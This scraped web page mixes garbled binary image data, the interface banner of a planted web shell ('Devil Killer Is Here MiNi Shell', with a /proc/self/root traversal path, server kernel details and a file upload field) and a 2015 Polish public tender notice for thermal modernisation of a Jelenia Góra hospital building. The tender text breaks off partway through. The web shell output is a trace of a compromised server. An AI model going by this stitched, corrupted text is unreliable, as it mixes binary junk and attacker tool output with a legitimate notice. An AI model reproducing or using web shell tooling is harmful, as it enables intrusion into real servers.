JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150327/42997-N-2015.html

<p class="kh_header"><b>Jelenia Góra: NOWOCZESNE ZARZĄDZANIE ENERGIĄ 
W WOJEWÓDZKIM CENTRUM SZPITALNYM KOTLINY JELENIOGÓRSKIEJ

ETAP I: TERMOMODERNIZACJA WRAZ Z WYMIANĄ INSTALACJI C.O 
W BUDYNKU D</b><br>
<b>Numer ogłoszenia: 42997 - 2015; data zamieszczenia: 27.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej , ul. Ogińskiego 6, 58-506 Jelenia Góra, woj. dolnośląskie, tel. 75 7537286, faks 75 7543883.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.jgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NOWOCZESNE ZARZĄDZANIE ENERGIĄ 
W WOJEWÓDZKIM CENTRUM SZPITALNYM KOTLINY JELENIOGÓRSKIEJ

ETAP I: TERMOMODERNIZACJA WRAZ Z WYMIANĄ INSTALACJI C.O 
W BUDYNKU D.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot  zamówienia dotyczy budynku D (nazywanego w dokumentacji projektowej  również segmentem D), z kompleksu obiektów wchodzących w skład Wojewódzkiego Centrum Szpitalnego Kotliny Jeleniogórskiej, położonych w Jeleniej Górze przy ul. Ogińskiego 6.  Budynek D jest budynkiem głównym, w którym na parterze zlokalizowana jest część administracyjna, a na  I piętrze - ogólnodostępne przychodnie lekarskie. Wszystkie roboty wykonywane będą w czynnym od poniedziałku do piątku obiekcie.  Należy przyjąć, że Zamawiający udostępniać będzie jednorazowo dwa(2) - trzy(3) pomieszczenia na każdej kondygnacji od poniedziałku do piątku, przy czym większa ilość pomieszczeń udostępniona będzie w okresie od godziny 15:00 w piątek do godziny 06:00 w poniedziałek. Oznacza to, że wykonawca, ze względu na funkcję  budynku, jest zobowiązany do 
prowadzenia robót budowlanych również w sobotę i niedzielę oraz na wydłużonym czasie pracy. 
Pomieszczenia w budynku D udostępniane będą wykonawcy sukcesywnie, zgodnie z opracowanym przez wykonawcę, a następnie  uzgodnionym i zatwierdzonym przez Zamawiającego, harmonogramem terminowym,  Ww. harmonogram wykonawca jest zobowiązany przedłożyć Zamawiającemu w ciągu maksymalnie 21 dni, licząc od daty podpisania umowy.
      Lokalizacja budynku D jest uszczegółowiona na rys. AI.001 w Projekcie budowlanym oznacz. jako plik [3]. 

Dla przejrzystości przedmiotu  zakres rzeczowy został podzielony na cztery części, z których: 
      Część 1.   obejmuje roboty budowlane polegające na dociepleniu budynku D, wymianie stolarki okiennej       i drzwiowej oraz wykonaniu zaprojektowanej kolorystyki elewacji. 
         Roboty prowadzone są wyłącznie do poziomu -3,30. Na realizację Części 1. Zamawiający posiada Decyzję zatwierdzającą projekt budowlany i udzielającą                        
     pozwolenia na  wykonanie robót budowlanych. Część 2.   obejmuje przebudowę (wymianę) instalacji centralnego ogrzewania w budynku D.
         Na realizację Części 2. Zamawiający posiada Decyzję zatwierdzającą projekt budowlany i udzielającą                        
     pozwolenia na  wykonanie robót budowlanych

     Część 3.   obejmuje wykonanie zabudowy (obudowa z zadaszeniem) wejścia głównego do budynku D łącznie ze
schodami wejściowymi, rozbiórkę istniejącego podjazdu dla niepełnosprawnych i wykonanie nowego, zgodnego z obowiązującymi wymogami i przepisami technicznymi, podjazdu dla niepełnosprawnych, po prawej stronie wejścia do głównego budynku, 
      Część 3. realizowana jest w formule _zaprojektuj i wybuduj_.

      Część 4.   obejmuje malowanie 70% metrów kwadratowych wszystkich pomieszczeń w budynku D, farbami emulsyjnymi     odpornymi na ścieranie na sucho (rodzaj III),  z przygotowaniem powierzchni, bez szpachlowania i_lub  gładzi.


    Poglądowy zakres rzeczowy obejmuje:
   
    Część 1. docieplenie styropianem ścian w gruncie wraz z wykonaniem izolacji pionowej przeciwwilgociowej;
       roboty prowadzone są wyłącznie do poziomu -3,30m; docieplenie styropianem ścian zewnętrznych betonowych ponad gruntem - ok. 65m2;
 docieplenie wełną mineralną ścian zewnętrznych, kominów  łącznie ok. 1 368m2; docieplenie wełną mineralną stropodachu wentylowanego- ok. 1 570m2; wymiana stolarki okiennej na nową z profili PVC, z nawiewnikami higrosterowanymi automatycznie- 
      ok. 572   m2 ( 156szt.) , w tym uwzględniona wymiana luksferów na stolarkę okienną ok. 33m2 = 1 szt.; wymiana świetlików dachowych na nowe_   uwaga zmiana:  27 sztuk świetlików poliwęglanowych na otworach  ok.95x95 [cm],  stanowiących kontynuację
      częściowo już wymienionych, o współczynniku przenikania ciepła  maksymalnie U=1,5 W/m2 K
  - wymiana stolarki drzwiowej zewnętrznej na nową, aluminiową - szt.2/ 9,36m2     
    uwaga-zmiana:   współczynnik przenikania ciepła: maksymalnie U=1,7 W/m2 K; wyprawa elewacyjna-  tynki zewnętrzne kat. III  z zaprawy cementowo-wapiennej - ok. 291,5m2;
       wyprawa elewacyjna cienkowarstwowa z tynku renowacyjnego - ok.  701,5m2; wyprawa elewacyjna cienkowarstwowa z tynku silikatowo-silikonowego- ok.1 040,5m2; remont schodów głównych- wejściowych; 
  rozbiórka balkonu wraz z przynależnymi schodami. 
   Kolorystyka elewacji- zgodnie z opracowaniem graficznym 

   Część 2. demontaż istniejących grzejników - ok. 188 kpl oraz przewodów instalacji c.o.- ok. 1 975m;
    naprawa i malowanie ścian po starych grzejnikach, w tym miedzy innymi: zabetonowanie otworów w stropach głębokości ponad 10 cm- ok. 244szt.; zamurowywanie przebić w ścianach z cegieł o gr. ponad 1 cegłę- ok. 254szt.  uszczelnianie przejść rur przez ścianę i strop masą ogniochronną- ok. 46szt.; uzupełnianie tynków- ok.76,5m2; montaż nowoprojektowanych przewodów c.o.- ok. 1 971m; montaż grzejników- ok. 205szt. z głowicami termostatycznymi antywandalowymi i zaworami  termostatycznymi
      oraz armatury; wpięcie nowoprojektowanej instalacji c.o. do istniejącego systemu zasilania w ciepło; malowanie farbami emulsyjnymi: tynków wewnętrznych- ok. 282m2, podłoży gipsowych z gruntowaniem  -ok. 277m2. 
   Odzyskany złom stanowi własność Zamawiającego, który należy złożyć w miejscu wskazanym przez Zamawiającego, w obrębie placu budowy.
   Pozostałe wyprodukowane odpady podlegają wywiezieniu z placu budowy i utylizację, przez  wykonawcę.

   Część 3.  rozbiórkę istniejącego podjazdu dla niepełnosprawnych, po prawej stronie głównego wejścia do budynku  i zaprojektowanie oraz wybudowanie nowego podjazdu dla niepełnosprawnych, zgodnie z obowiązującymi wymogami i przepisami technicznymi; zaprojektowanie, dostawę i wykonanie obudowy strefy wejściowe, która powinna być przewidziana   w systemie  konstrukcyjnym tak zwanym _lekkim_ (to znaczy z profili na przykład stalowych, aluminiowych, PVC lub systemowych- jeżeli istnieją), obłożone materiałem przepuszczającym światło na przykład szkłem bezpiecznym lub poliwęglanem. Dopuszcza się też inne rozwiązania materiałowe zaproponowane przez wykonawcę  pod warunkiem, że spełniają one ww. kryteria. Całość (swą bryłą) powinna podkreślać, iż jest to główne wejście do budynku. 
   Nowoprojektowany podjazd dla niepełnosprawnych, na ścianie obudowy, winien być zamknięty drzwiami przesuwnymi, otwieranymi automatycznie fotokomórką. 
   Wejście  na schody do budynku- od frontu ( w obrębie istniejącego chodnika) winno posiadać dwoje drzwi przesuwnych działających na fotokomórkę, natomiast z boków ( po lewej i prawej stronie zadaszenia)  w obrębie chodnika- drzwi z pochwytem antypanicznym.
  

Dolna część obudowy ścian może być częściowo- maksymalnie  do wysokości 1,30m, wypełniona panelami nieprzeziernymi, dach dwuspadowy- przeszklony, stanowiący doświetlenie powstałego wiatrołapu, poza energooszczędnym oświetleniem wewnętrznym.
Pod istniejącymi schodami przebiega rura kanalizacyjna, którą należy uwzględnić  przy projektowaniu posadowienia konstrukcji nośnej w celu uniknięcia kolizji.
Zamawiający, po wykonaniu ekspertyzy technicznej przez wykonawcę, dopuszcza możliwość wykorzystania istniejącej konstrukcji wejścia do budynku.

W zakresie Części 3. do wykonawcy należy uzyskanie mapy do celów projektowych, wszelkich niezbędnych uzgodnień jak również, w imieniu Zamawiającego, pozwolenia na budowę. 

Wykonawca, na etapie roboczym, jest zobowiązany do przedstawienia Zamawiającemu koncepcji zabudowy                    i uzyskania akceptacji. Zamawiający ma prawo do wniesienia uwag i żądania jej zmiany, o ile proponowane zmiany nie będą  wykraczać poza wymienione na wstępie wytyczne. 

Projekt  opracowany na bazie zatwierdzonej koncepcji wraz z ewentualną ekspertyzą techniczną wykonawca winien wykonać w 4 egzemplarzach w wersji papierowej i 1 egzemplarzu - na nośniku elektronicznym. 

   Część 4.  obejmuje malowanie 70%  metrów kwadratowych wszystkich pomieszczeń w budynku D, farbami emulsyjnymi odpornymi na ścieranie na sucho (rodzaj III),  z przygotowaniem powierzchni w zakresie przewidzianym w pozycji kosztorysowej Katalogu Nakładów Rzeczowych 4-01, bez uwzględnienia szpachlowania  i_lub  gładzi.
   70%  metrów kwadratowych  powierzchni nie obejmuje zakresu z Części 2. tj.  malowania farbami emulsyjnymi: tynków wewnętrznych- ok. 282m2, podłoży gipsowych z gruntowaniem -ok. 277m2.

2.  Szczegółowy opis przedmiotu zamówienia dla  Części 1 i Części 2. zawarty jest w Rozdziale  III.  Specyfikacji   Istotnych Warunków Zamówienia pn. Opis przedmiotu zamówienia, ogólnie zwanym Dokumentacją projektową. Wszystkie podane zmiany są obowiązujące wykonawców przy ustalaniu umownej ceny.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.51.40-0, 45.11.11.00-9, 45.42.10.00-4, 45.26.21.00-2, 45.32.10.00-3, 45.41.00.00-1, 45.33.11.00-7, 45.21.47.10-0, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości:  50 000 PLN     (słownie: pięćdziesiąt tysięcy złotych).
2. Wadium może być wniesione w następujących formach:
a)	 pieniądzu
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że    poręczenie
       kasy jest zawsze poręczeniem pieniężnym,
c)	  gwarancjach bankowych,
d)	  gwarancjach ubezpieczeniowych,
e)	  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r.         o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275,              z późniejszymi zmianami).
3.  W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczeń  -  dokumenty te powinny    być sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)	 nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji lub poręczenia ( Zamawiającego),  
  gwaranta ( banku lub instytucji udzielających gwarancji lub poręczenia ) oraz wskazanie ich siedzib,
b)	  określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	  kwotę gwarancji lub poręczenia,
d)	  termin ważności gwarancji lub poręczenia ,
  e)   zobowiązanie gwaranta do bezwarunkowego i nieodwołalnego zapłacenia  kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :
- że  wykonawca,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 upzp.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 upzp. lub  pełnomocnictw, a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie,
lub


-  że wykonawca ,  którego ofertę wybrano:
        - odmówił podpisania umowy na warunkach określonych w ofercie,     lub
        - nie wniósł zabezpieczenia należytego wykonania umowy,    lub
        - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
W przypadku, gdy gwarancje lub poręczenia nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.


4.   Wadium w formie gwarancji  lub poręczeń  nie podlega  przeniesieniu na osoby trzecie.
5.  Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem na rachunek Zamawiającego,  otwarty    
w banku: PKO Bank Polski S.A. nr 23 1020 2137 0000 9702 0129 1483, z dopiskiem_Wadium -termomodernizacja - budynek D.
      Wskazane jest, aby kopia polecenia przelewu na konto Zamawiającego potwierdzona za zgodność  z oryginałem przez Wykonawcę, została dołączona do oferty. 
6. Wadium wnoszone w dopuszczonej przez Zamawiającego formie innej, niż  pieniądz,  Wykonawca wnosi do Zamawiającego przy czym, w takim przypadku za termin doręczenia uważa się datę jego zdeponowania                       w sekretariacie WCSzKJ, budynek D, parter- strona prawa, segment administracja, pokój 171.     lub
      wadium  w dopuszczonej  przez Zamawiającego formie innej, niż pieniądz, Wykonawca  może dołączyć do oferty - pod warunkiem, że umieszczone zostanie w osobnej kopercie opisanej: nazwa i adres wykonawcy, adnotacja: Wadium - termomodernizacja- budynek D, w sposób  umożliwiający Zamawiającemu   zdeponowanie  wadium - bez konieczności  naruszenia koperty, w której znajduje się oferta.
7.  Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
      Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest niewystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.
8. W przypadku wnoszenia przez Wykonawcę wadium w formie gwarancji lub poręczeń muszą one być co najmniej bezwarunkowe, nieodwołalne, nie podlegające przeniesieniu na osoby trzecie i płatne na pierwsze pisemne żądanie Zamawiającego. 
9.   Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 upzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia wykazu  wykonanych robót budowlanych w okresie ostatnich 5 lat  przed upływem terminu  składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz    z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone. 
            Decyzja, które roboty budowlane widniejące w ww. wykazie są najważniejsze, pozostawiona jest  Wykonawcy,            z zastrzeżeniem treści zdania następnego.
          Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie                  i wykazane w ww. Wykazie realizacje, z których:
co najmniej jedna(1) dotyczy robót budowlanych polegających na wykonaniu ocieplenia budynku
 wysokości co najmniej budynku dwukondygnacyjnego i na powierzchni co najmniej 600m2, z wykonaniem
 elewacji;
 co najmniej jedna(1) dotyczy wykonania instalacji centralnego ogrzewania w budynku co najmniej
   dwukondygnacyjnym i na wartość netto co najmniej 300 000zł; 

Przez pojęcie, zgodnie z ustawą Prawo budowlane, należy rozumieć :
(a)	budynek - należy rozumieć taki obiekt budowlany, który jest trwale związany z gruntem, wydzielony             
        z przestrzenie za pomocą przegród budowlanych oraz posiada fundament i dach.
(b)	obiekt budowlany - należy przez to rozumieć budynek wraz z instalacjami i urządzeniami technicznymi.

Każda z realizacji uznanych przez Wykonawcę za najważniejszą oraz realizacji wykazanych na potwierdzenie spełnienia warunku udziału w postępowaniu  powinna być poparta załączonymi: 
dowodami określającymi ,że te roboty zostały wykonane w sposób należyty oraz wskazujących, że zostały  wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

      Dowodami są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym
      charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.
      Wykonawca jest zobowiązany podać obiektywne przyczyny, jeżeli korzysta w tej drugiej formy dowodów.
      Ww. dowody muszą być wydane przez podmiot na  rzecz, którego wskazane roboty budowlane zostały  wykonane. 

W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane zostały wykonane wcześniej, Wykonawca nie ma obowiązku przedkładania ww. dowodów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia, w szczególności osoby odpowiedzialne za kierowanie robotami budowlanymi, tj. 

(a)	 Kierownika Budowy  posiadającego uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów     
(b)	 Kierownika robót lub majstra robót 

Jeżeli wskazana osoba do pełnienia funkcji kierownika budowy jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji   w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych.

Zamawiający uzna warunek za spełniony w oparciu o  złożone przez Wykonawcę stosowne oświadczenie                   i Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
a)	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi            i zdolnością kredytową)  - w wysokości co najmniej 700 000  PLN;

b)	że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                  z przedmiotem zamówienia na kwotę minimum  2 000 000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>- co najmniej jedna(1) dotyczy robót budowlanych polegających na wykonaniu ocieplenia budynku wysokości co najmniej budynku dwukondygnacyjnego i na powierzchni co najmniej 600m2, z wykonaniem
 elewacji;
-  co najmniej jedna(1) dotyczy wykonania instalacji centralnego ogrzewania w budynku co najmniej dwukondygnacyjnym i na wartość netto co najmniej 300 000zł;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

